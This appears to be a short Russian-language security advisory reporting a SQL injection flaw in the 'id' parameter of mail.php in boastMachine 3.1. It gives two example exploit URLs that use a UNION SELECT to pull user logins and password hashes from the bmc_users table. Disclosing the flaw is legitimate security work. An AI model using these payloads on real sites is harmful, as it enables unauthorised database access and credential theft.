Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: boastMachine 3.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием mail.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://localhost/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58), user_pass),4/**/from/**/bmc_users/**/where/**/id=1/* &blog=[blog_id]
http://localhost/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58), user_pass),4/**/from/**/bmc_users/**/where/* */id=1/*&blog=1